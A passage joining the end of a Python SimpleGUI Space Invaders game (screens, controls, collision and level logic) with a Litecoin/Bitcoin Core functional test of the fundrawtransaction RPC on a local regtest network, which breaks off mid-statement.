canvas.draw_text("WP:"+str(player.power), [280, 61], 10, "00c5fe") return canvas def draw_level(canvas): canvas.draw_text("Level : ", [FIELD_WIDTH-200, 50], 50, "Red") canvas.draw_text(str(level), [FIELD_WIDTH-50, 50], 50, "Yellow") return canvas def draw_scores(canvas): canvas.draw_text(str(int(scores)), [400, 50], 50, "LightBlue") return canvas def draw_screen(canvas): # border of board canvas.draw_image(bckg[current_back], (425, 250), (850, 500), \ (LEFT_MARGIN+FIELD_WIDTH//2, TOP_MARGIN+FIELD_HEIGHT//2),\ (FIELD_WIDTH, FIELD_HEIGHT)) canvas.draw_polygon([[LEFT_MARGIN, TOP_MARGIN], [LEFT_MARGIN, FIELD_HEIGHT+TOP_MARGIN], [FIELD_WIDTH+LEFT_MARGIN, FIELD_HEIGHT+TOP_MARGIN], [FIELD_WIDTH+LEFT_MARGIN, TOP_MARGIN]], 2, 'Orange') return canvas def draw_start_screen(canvas): img_count = 1 + len(aImages)*(len(aImages[0])) + len(bckg) loaded_img_count = 0 if pImage.get_width()<>0: loaded_img_count += 1 for bImage in bckg: if bImage.get_width()<>0: loaded_img_count += 1 for aImg in aImages: for img in aImg: if img.get_width()<>0: loaded_img_count += 1 loaded_sounds = 0 for snd in sounds: if snd <> None: loaded_sounds += 1 draw_text(canvas, "SPACE INVANDERS", [220, 150], 50, [3, 3], ["blue", "yellow"]) canvas.draw_text("ver. - "+VER, [600, 170], 20, "yellow") canvas.draw_text("03 nov. 2013", [600, 190], 20, "yellow") draw_text(canvas, "CONTROLS:", [110, 210], 24, [2, 2], ["green", "yellow"]) draw_text(canvas, "Arrows - to left and right, space - to fire, P to pause game", [110, 240], 24, [2, 2], ["green", "yellow"]) draw_text(canvas, "Bonuses: ", [110, 280], 24, [2, 2], ["green", "yellow"]) b = Bonus(0, [125, 310]) b.draw(canvas) draw_text(canvas, " - increase user's bullet speed", [150, 320], 24, [2, 2], ["green", "yellow"]) b = Bonus(1, [125, 350]) b.draw(canvas) draw_text(canvas, " - increase user's bullet number", [150, 360], 24, [2, 2], ["green", "yellow"]) b = Bonus(2, [125, 390]) b.draw(canvas) draw_text(canvas, " - add life", [150, 400], 24, [2, 2], ["green", "yellow"]) b = Bonus(3, [125, 430]) b.draw(canvas) draw_text(canvas, " - increase weapon power", [150, 440], 24, [2, 2], ["green", "yellow"]) if loaded_img_count<img_count: draw_text(canvas, "Please, wait for loading...", [280, 500], 40, [3, 3], ["Blue", "Yellow"]) s = "Loaded "+str(loaded_img_count)+" images of "+str(img_count) draw_text(canvas, s, [110, 550], 20, [2, 2], ["Blue", "yellow"]) s = "Loaded "+str(loaded_sounds)+" sounds of "+str(len(sounds)) draw_text(canvas, s, [510, 550], 20, [2, 2], ["Blue", "yellow"]) else: draw_text(canvas, "Click to start game", [300, 500], 40, [3, 3], ["Blue", "yellow"]) frame.set_mouseclick_handler(click_handler) return canvas def draw_end_screen(canvas): draw_text(canvas, "Game over!", [350, 180], 50, [2, 2], ["Blue", "Yellow"]) draw_text(canvas, "Your score is "+str(int(scores)), [330, 240], 35, [2, 2], ["blue", "Yellow"]) draw_text(canvas, "You shoot "+str(int(shoot_count))+" times", [150, 320], 24, [2, 2], ["blue", "Yellow"]) draw_text(canvas, "You kill a "+str(killed)+" aliens", [150, 360], 24, [2, 2], ["blue", "Yellow"]) if shoot_count == 0: s = "0" else: s = str(int(10000*float(killed)/shoot_count)/100.0) draw_text(canvas, "Your accuracy is "+s+"%", [150, 400], 24, [2, 2], ["blue", "Yellow"]) i = 0 for bc in bonus_count: b = Bonus(i, [505, 310 + 40*i]) b.draw(canvas) draw_text(canvas, " - used "+str(bonus_count[i])+" times", [530, 320+40*i], 24, [2, 2], ["blue", "yellow"]) i += 1 draw_text(canvas, "Click to start new game", [300, 500], 40, [2, 2], ["blue", "Yellow"]) canvas.draw_text("ver. - "+VER, [600, 540], 15, "yellow"); return canvas def draw_game_objects(canvas): player.draw(canvas) #draw_user_image(canvas, Player) for bullet in alien_bullets: bullet.draw(canvas) for bullet in user_bullet: bullet.draw(canvas) for bonus in bonuses: bonus.draw(canvas) alien_fleet.draw(canvas) readyGo() if paused: draw_text(canvas, "P A U S E", [380, 350], 50, [2, 2], ["Green", "Yellow"]) if ready: draw_text(canvas, "R E A D Y", [380, 350], 50, [2, 2], ["Green", "Yellow"]) if go: draw_text(canvas, "G O ! ! !", [380, 350], 50, [2, 2], ["Green", "Yellow"]) sndTheme.play() return canvas def moving_objects(): global timer_counter if not GameRunning: return None if paused or ready or go or player_killed: return None timer_counter += 1 player.move() for alien in alien_fleet.aliens: if alien.flying: alien.move([0,0]) if isBulletHit(alien, player): player.explode() if alien.y>FIELD_HEIGHT + TOP_MARGIN+20: alien.y = TOP_MARGIN for bonus in bonuses: bonus.move(); if bonus.y > FIELD_HEIGHT + TOP_MARGIN+20: bonuses.remove(bonus) if isBulletHit(bonus, player): bonus.execute() bonuses.remove(bonus) for bullet in user_bullet: bullet.move() alien_fleet.check_death() for bullet in user_bullet: if bullet.y<TOP_MARGIN+25: user_bullet.remove(bullet) # for bullet in alien_bullets: bullets_to_delete = [] for bullet in list(alien_bullets): bullet.move() if bullet.y > FIELD_HEIGHT + TOP_MARGIN -10: bullets_to_delete.append(bullet) if isBulletHit(bullet, player): player.explode() for bullet in bullets_to_delete: if bullet in alien_bullets: alien_bullets.remove(bullet) alien_fleet.make_shoot() alien_fleet.alien_fly() if level<30: x = 60 - level else: x = 1 if timer_counter % x == 0: alien_fleet.move_side() if timer_counter % (100 + x) == 0: alien_fleet.move_down() if alien_fleet.get_aliens_count() == 0: new_level() # Handler to draw on canvas def draw(canvas): draw_screen(canvas) canvas.draw_text(mes, [250, 250], 40, "Yellow") ###################### #check a begin of game # if GameEnded: draw_end_screen(canvas) elif not GameRunning: draw_start_screen(canvas) else: ################## # game info draw_lives(canvas) draw_weapons(canvas) draw_level(canvas) draw_scores(canvas) draw_game_objects(canvas) return canvas def readyGo(): global ready, go ready = time.time()-level_time[len(level_time)-1]<0.7 go = (not ready) and time.time()-level_time[len(level_time)-1]<1.5 player_killed = time.time() - player_killed_at < 1.2 #Initialization and start of game def start_game(): global GameRunning, alien_fleet, player, GameEnded global scores, killed, level, level_time, bonus_count scores = 0 bonus_count = [0, 0, 0, 0] killed = 0 level = 0 GameEnded = False GameRunning = True new_level() player = Player([FIELD_WIDTH //2, FIELD_HEIGHT + TOP_MARGIN-20], 3) return None def stop_game(): global GameRunning, GameEnded # aTimer.stop() GameEnded = True GameRunning = False level_time.append(time.time()) frame.set_keydown_handler(dummy) frame.set_keyup_handler(dummy) return None # Handler for mouse click def click_handler(position): if not GameRunning: start_game() #else: # stop_game() return position #### keydown_handler def keydown(key): global keypressed, mes, shoot_count, player_speed keypressed = key if (key == simplegui.KEY_MAP['p']) or \ (key == simplegui.KEY_MAP['P']): pause() else: if (key == simplegui.KEY_MAP['right']): #player.move('right') player_speed = PLAYER_SPEED elif (key == simplegui.KEY_MAP['left']): # player.move('left') player_speed = -PLAYER_SPEED if (key == simplegui.KEY_MAP['space'])and(GameRunning): if len(user_bullet) < weapon_level: b = Bullet([player.x, player.y], "LightBlue", -weapon_speed) user_bullet.append(b) sndPlayer.play() shoot_count += 1 return #### keyup_handler to stop keydown def keyup(key): global player_speed #if keytimer.is_running(): # keytimer.stop() if (key == simplegui.KEY_MAP['right'])or(key == simplegui.KEY_MAP['left']): player_speed = 0 return def isBulletHit(bullet, obj): if (bullet.y+bullet.height//2+2 > obj.y-obj.height // 2) and (bullet.y-bullet.height//2-2<obj.y+obj.height//2): if (bullet.x+bullet.width//2 +2> obj.x - obj.width//2) and (bullet.x-bullet.width//2 -2< obj.x + obj.width//2): return True else: return False else: return False def new_level(): global level, alien_fleet, user_bullet, alien_bullets, current_back, player global level_time, player_speed level_time.append(time.time()) current_back = random.randrange(12) level += 1 player_speed = 0 user_bullet = [] alien_bullets = [] alien_fleet = AliensFleet([250, 100]) if level % 10 == 0: player.lives += 1 sndBonus.play() # Create a frame and assign callbacks to event handlers frame = simplegui.create_frame("Galaxian", 900, 600, 0) frame.set_draw_handler(draw) frame.set_keydown_handler(keydown) frame.set_keyup_handler(keyup) aTimer = simplegui.create_timer(60, moving_objects) aTimer.start() # Start the frame animation frame.start()
#!/usr/bin/env python3 # Copyright (c) 2014-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test the fundrawtransaction RPC.""" from test_framework.test_framework import BitcoinTestFramework, BITCOIND_PROC_WAIT_TIMEOUT from test_framework.util import * def get_unspent(listunspent, amount): for utx in listunspent: if utx['amount'] == amount: return utx raise AssertionError('Could not find unspent with amount={}'.format(amount)) class RawTransactionsTest(BitcoinTestFramework): def __init__(self): super().__init__() self.setup_clean_chain = True self.num_nodes = 4 def setup_network(self, split=False): self.setup_nodes() connect_nodes_bi(self.nodes, 0, 1) connect_nodes_bi(self.nodes, 1, 2) connect_nodes_bi(self.nodes, 0, 2) connect_nodes_bi(self.nodes, 0, 3) def run_test(self): min_relay_tx_fee = self.nodes[0].getnetworkinfo()['relayfee'] # This test is not meant to test fee estimation and we'd like # to be sure all txs are sent at a consistent desired feerate for node in self.nodes: node.settxfee(min_relay_tx_fee) # if the fee's positive delta is higher than this value tests will fail, # neg. delta always fail the tests. # The size of the signature of every input may be at most 2 bytes larger # than a minimum sized signature. # = 2 bytes * minRelayTxFeePerByte feeTolerance = 2 * min_relay_tx_fee/1000 self.nodes[2].generate(1) self.sync_all() self.nodes[0].generate(121) self.sync_all() # ensure that setting changePosition in fundraw with an exact match is handled properly rawmatch = self.nodes[2].createrawtransaction([], {self.nodes[2].getnewaddress():50}) rawmatch = self.nodes[2].fundrawtransaction(rawmatch, {"changePosition":1, "subtractFeeFromOutputs":[0]}) assert_equal(rawmatch["changepos"], -1) watchonly_address = self.nodes[0].getnewaddress() watchonly_pubkey = self.nodes[0].validateaddress(watchonly_address)["pubkey"] watchonly_amount = Decimal(200) self.nodes[3].importpubkey(watchonly_pubkey, "", True) watchonly_txid = self.nodes[0].sendtoaddress(watchonly_address, watchonly_amount) self.nodes[0].sendtoaddress(self.nodes[3].getnewaddress(), watchonly_amount / 10) self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.5) self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0) self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 5.0) self.nodes[0].generate(1) self.sync_all() ############### # simple test # ############### inputs = [ ] outputs = { self.nodes[0].getnewaddress() : 1.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) assert(len(dec_tx['vin']) > 0) #test that we have enough inputs ############################## # simple test with two coins # ############################## inputs = [ ] outputs = { self.nodes[0].getnewaddress() : 2.2 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) assert(len(dec_tx['vin']) > 0) #test if we have enough inputs ############################## # simple test with two coins # ############################## inputs = [ ] outputs = { self.nodes[0].getnewaddress() : 2.6 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) assert(len(dec_tx['vin']) > 0) assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '') ################################ # simple test with two outputs # ################################ inputs = [ ] outputs = { self.nodes[0].getnewaddress() : 2.6, self.nodes[1].getnewaddress() : 2.5 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 for out in dec_tx['vout']: totalOut += out['value'] assert(len(dec_tx['vin']) > 0) assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '') ######################################################################### # test a fundrawtransaction with a VIN greater than the required amount # ######################################################################### utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}] outputs = { self.nodes[0].getnewaddress() : 1.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 for out in dec_tx['vout']: totalOut += out['value'] assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee ##################################################################### # test a fundrawtransaction with which will not get a change output # ##################################################################### utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}] outputs = { self.nodes[0].getnewaddress() : Decimal(5.0) - fee - feeTolerance } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 for out in dec_tx['vout']: totalOut += out['value'] assert_equal(rawtxfund['changepos'], -1) assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee #################################################### # test a fundrawtransaction with an invalid option # #################################################### utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ] outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) assert_raises_jsonrpc(-3, "Unexpected key foo", self.nodes[2].fundrawtransaction, rawtx, {'foo':'bar'}) ############################################################ # test a fundrawtransaction with an invalid change address # ############################################################ utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ] outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) assert_raises_jsonrpc(-5, "changeAddress must be a valid litecoin address", self.nodes[2].fundrawtransaction, rawtx, {'changeAddress':'foobar'}) ############################################################ # test a fundrawtransaction with a provided change address # ############################################################ utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ] outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) change = self.nodes[2].getnewaddress() assert_raises_jsonrpc(-8, "changePosition out of bounds", self.nodes[2].fundrawtransaction, rawtx, {'changeAddress':change, 'changePosition':2}) rawtxfund = self.nodes[2].fundrawtransaction(rawtx, {'changeAddress': change, 'changePosition': 0}) dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) out = dec_tx['vout'][0] assert_equal(change, out['scriptPubKey']['addresses'][0]) ######################################################################### # test a fundrawtransaction with a VIN smaller than the required amount # ######################################################################### utx = get_unspent(self.nodes[2].listunspent(), 1) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}] outputs = { self.nodes[0].getnewaddress() : 1.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) # 4-byte version + 1-byte vin count + 36-byte prevout then script_len rawtx = rawtx[:82] + "0100" + rawtx[84:] dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 matchingOuts = 0 for i, out in enumerate(dec_tx['vout']): totalOut += out['value'] if out['scriptPubKey']['addresses'][0] in outputs: matchingOuts+=1 else: assert_equal(i, rawtxfund['changepos']) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex']) assert_equal(matchingOuts, 1) assert_equal(len(dec_tx['vout']), 2) ########################################### # test a fundrawtransaction with two VINs # ########################################### utx = get_unspent(self.nodes[2].listunspent(), 1) utx2 = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ] outputs = { self.nodes[0].getnewaddress() : 6.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 matchingOuts = 0 for out in dec_tx['vout']: totalOut += out['value'] if out['scriptPubKey']['addresses'][0] in outputs: matchingOuts+=1 assert_equal(matchingOuts, 1) assert_equal(len(dec_tx['vout']), 2) matchingIns = 0 for vinOut in dec_tx['vin']: for vinIn in inputs: if vinIn['txid'] == vinOut['txid']: matchingIns+=1 assert_equal(matchingIns, 2) #we now must see two vins identical to vins given as params ######################################################### # test a fundrawtransaction with two VINs and two vOUTs # ######################################################### utx = get_unspent(self.nodes[2].listunspent(), 1) utx2 = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ] outputs = { self.nodes[0].getnewaddress() : 6.0, self.nodes[0].getnewaddress() : 1.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 matchingOuts = 0 for out in dec_tx['vout']: totalOut += out['value'] if out['scriptPubKey']['addresses'][0] in outputs: matchingOuts+=1 assert_equal(matchingOuts, 2) assert_equal(len(dec_tx['vout']), 3) ############################################## # test a fundrawtransaction with invalid vin # ############################################## listunspent = self.nodes[2].listunspent() inputs = [ {'txid' : "1c7f966dab21119bac53213a2bc7532bff1fa844c124fd750a7d0b1332440bd1", 'vout' : 0} ] #invalid vin! outputs = { self.nodes[0].getnewaddress() : 1.0} rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_raises_jsonrpc(-4, "Insufficient funds", self.nodes[2].fundrawtransaction, rawtx) ############################################################ #compare fee of a standard pubkeyhash transaction inputs = [] outputs = {self.nodes[1].getnewaddress():1.1} rawtx = self.nodes[0].createrawtransaction(inputs, outputs) fundedTx = self.nodes[0].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1.1) signedFee = self.nodes[0].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance) ############################################################ ############################################################ #compare fee of a standard pubkeyhash transaction with multiple outputs inputs = [] outputs = {self.nodes[1].getnewaddress():1.1,self.nodes[1].getnewaddress():1.2,self.nodes[1].getnewaddress():0.1,self.nodes[1].getnewaddress():1.3,self.nodes[1].getnewaddress():0.2,self.nodes[1].getnewaddress():0.3} rawtx = self.nodes[0].createrawtransaction(inputs, outputs) fundedTx = self.nodes[0].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[0].sendmany("", outputs) signedFee = self.nodes[0].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance) ############################################################ ############################################################ #compare fee of a 2of2 multisig p2sh transaction # create 2of2 addr addr1 = self.nodes[1].getnewaddress() addr2 = self.nodes[1].getnewaddress() addr1Obj = self.nodes[1].validateaddress(addr1) addr2Obj = self.nodes[1].validateaddress(addr2) mSigObj = self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) inputs = [] outputs = {mSigObj:1.1} rawtx = self.nodes[0].createrawtransaction(inputs, outputs) fundedTx = self.nodes[0].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[0].sendtoaddress(mSigObj, 1.1) signedFee = self.nodes[0].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance) ############################################################ ############################################################ #compare fee of a standard pubkeyhash transaction # create 4of5 addr addr1 = self.nodes[1].getnewaddress() addr2 = self.nodes[1].getnewaddress() addr3 = self.nodes[1].getnewaddress() addr4 = self.nodes[1].getnewaddress() addr5 = self.nodes[1].getnewaddress() addr1Obj = self.nodes[1].validateaddress(addr1) addr2Obj = self.nodes[1].validateaddress(addr2) addr3Obj = self.nodes[1].validateaddress(addr3) addr4Obj = self.nodes[1].validateaddress(addr4) addr5Obj = self.nodes[1].validateaddress(addr5) mSigObj = self.nodes[1].addmultisigaddress(4, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey'], addr4Obj['pubkey'], addr5Obj['pubkey']]) inputs = [] outputs = {mSigObj:1.1} rawtx = self.nodes[0].createrawtransaction(inputs, outputs) fundedTx = self.nodes[0].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[0].sendtoaddress(mSigObj, 1.1) signedFee = self.nodes[0].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance) ############################################################ ############################################################ # spend a 2of2 multisig transaction over fundraw # create 2of2 addr addr1 = self.nodes[2].getnewaddress() addr2 = self.nodes[2].getnewaddress() addr1Obj = self.nodes[2].validateaddress(addr1) addr2Obj = self.nodes[2].validateaddress(addr2) mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # send 1.2 BTC to msig addr txId = self.nodes[0].sendtoaddress(mSigObj, 1.2) self.sync_all() self.nodes[1].generate(1) self.sync_all() oldBalance = self.nodes[1].getbalance() inputs = [] outputs = {self.nodes[1].getnewaddress():1.1} rawtx = self.nodes[2].createrawtransaction(inputs, outputs) fundedTx = self.nodes[2].fundrawtransaction(rawtx) signedTx = self.nodes[2].signrawtransaction(fundedTx['hex']) txId = self.nodes[2].sendrawtransaction(signedTx['hex']) self.sync_all() self.nodes[1].generate(1) self.sync_all() # make sure funds are received at node1 assert_equal(oldBalance+Decimal('1.10000000'), self.nodes[1].getbalance()) ############################################################ # locked wallet test self.stop_node(0) self.stop_node(2) self.stop_node(3) self.nodes[1].encryptwallet("test") self.bitcoind_processes[1].wait(timeout=BITCOIND_PROC_WAIT_TIMEOUT) self.nodes = self.start_nodes(self.num_nodes, self.options.tmpdir) # This test is not meant to test fee estimation and we'd like # to be sure all txs are sent at a consistent desired feerate for node in self.nodes: node.settxfee(min_relay_tx_fee) connect_nodes_bi(self.nodes,0,1) connect_nodes_bi(self.nodes,1,2) connect_nodes_bi(self.nodes,0,2) connect_nodes_bi(self.nodes,0,3) self.sync_all() # drain the keypool self.nodes[1].getnewaddress() self.nodes[1].getrawchangeaddress() inputs = [] outputs = {self.nodes[0].getnewaddress():1.1} rawtx = self.nodes[1].createrawtransaction(inputs, outputs) # fund a transaction that requires a new key for the change output # creating the key must be impossible because the wallet is locked assert_raises_jsonrpc(-4, "Keypool ran out, please call keypoolrefill first", self.nodes[1].fundrawtransaction, rawtx) #refill the keypool self.nodes[1].walletpassphrase("test", 100) self.nodes[1].keypoolrefill(8) #need to refill the keypool to get an internal change address self.nodes[1].walletlock() assert_raises_jsonrpc(-13, "walletpassphrase", self.nodes[1].sendtoaddress, self.nodes[0].getnewaddress(), 1.2) oldBalance = self.nodes[0].getbalance() inputs = [] outputs = {self.nodes[0].getnewaddress():1.1} rawtx = self.nodes[1].createrawtransaction(inputs, outputs) fundedTx = self.nodes[1].fundrawtransaction(rawtx) #now we need to unlock self.nodes[1].walletpassphrase("test", 600) signedTx = self.nodes[1].signrawtransaction(fundedTx['hex']) txId = self.nodes[1].sendrawtransaction(signedTx['hex']) self.nodes[1].generate(1) self.sync_all() # make sure funds are received at node1 assert_equal(oldBalance+Decimal('51.10000000'), self.nodes[0].getbalance()) ############################################### # multiple (~19) inputs tx test | Compare fee # ############################################### #empty node1, send some small coins from node0 to node1 self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True) self.sync_all() self.nodes[0].generate(1) self.sync_all() for i in range(0,20): self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01) self.nodes[0].generate(1) self.sync_all() #fund a tx with ~20 small inputs inputs = [] outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04} rawtx = self.nodes[1].createrawtransaction(inputs, outputs) fundedTx = self.nodes[1].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[1].sendmany("", outputs) signedFee = self.nodes[1].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance*19) #~19 inputs ############################################# # multiple (~19) inputs tx test | sign/send # ############################################# #again, empty node1, send some small coins from node0 to node1 self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True) self.sync_all() self.nodes[0].generate(1) self.sync_all() for i in range(0,20): self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01) self.nodes[0].generate(1) self.sync_all() #fund a tx with ~20 small inputs oldBalance = self.nodes[0].getbalance() inputs = [] outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04} rawtx = self.nodes[1].createrawtransaction(inputs, outputs) fundedTx = self.nodes[1].fundrawtransaction(rawtx) fundedAndSignedTx = self.nodes[1].signrawtransaction(fundedTx['hex']) txId = self.nodes[1].sendrawtransaction(fundedAndSignedTx['hex']) self.sync_all() self.nodes[0].generate(1) self.sync_all() assert_equal(oldBalance+Decimal('50.19000000'), self.nodes[0].getbalance()) #0.19+block reward ##################################################### # test fundrawtransaction with OP_RETURN and no vin # ##################################################### rawtx = "0100000000010000000000000000066a047465737400000000" dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(len(dec_tx['vin']), 0) assert_equal(len(dec_tx['vout']), 1) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) assert_greater_than(len(dec_tx['vin']), 0) # at least one vin assert_equal(len(dec_tx['vout']), 2) # one change output added ################################################## # test a fundrawtransaction using only watchonly # ################################################## inputs = [] outputs = {self.nodes[2].getnewaddress() : watchonly_amount / 2} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) result = self.nodes[3].fundrawtransaction(rawtx, {'includeWatching': True }) res_dec = self.nodes[0].decoderawtransaction(result["hex"]) assert_equal(len(res_dec["vin"]), 1) assert_equal(res_dec["vin"][0]["txid"], watchonly_txid) assert("fee" in result.keys()) assert_greater_than(result["changepos"], -1) ############################################################### # test fundrawtransaction using the entirety of watched funds # ############################################################### inputs = [] outputs = {self.nodes[2].getnewaddress() : watchonly_amount} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) # Backward compatibility test (2nd param is includeWatching) result = self.nodes[3].fundrawtransaction(rawtx, True) res_dec = self.nodes[0].decoderawtransaction(result["hex"]) assert_equal(len(res_dec["vin"]), 2) assert(res_dec["vin"][0]["txid"] == watchonly_txid or res_dec["vin"][1]["txid"] == watchonly_txid) assert_greater_than(result["fee"], 0) assert_greater_than(result["changepos"], -1) assert_equal(result["fee"] + res_dec["vout"][result["changepos"]]["value"], watchonly_amount / 10) signedtx = self.nodes[3].signrawtransaction(result["hex"]) assert(not signedtx["complete"]) signedtx = self.nodes[0].signrawtransaction(signedtx["hex"]) assert(signedtx["complete"]) self.nodes[0].sendrawtransaction(signedtx["hex"]) self.nodes[0].generate(1) self.sync_all() ####################### # Test feeRate option # ####################### # Make sure there is exactly one input so coin selection can't skew the result assert_equal(len(self.nodes[3].listunspent(1)), 1) inputs = [] outputs = {self.nodes[3].getnewaddress() : 1} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) result = self.nodes[3].fundrawtransaction(rawtx) # uses min_relay_tx_fee (set by settxfee) result2 = self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 2*min_relay_tx_fee}) result3 = self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 10*min_relay_tx_fee}) result_fee_rate = result['fee'] * 1000 / count_bytes(result['hex']) assert_fee_amount(result2['fee'], count_bytes(result2['hex']), 2 * result_fee_rate) assert_fee_amount(result3['fee'], 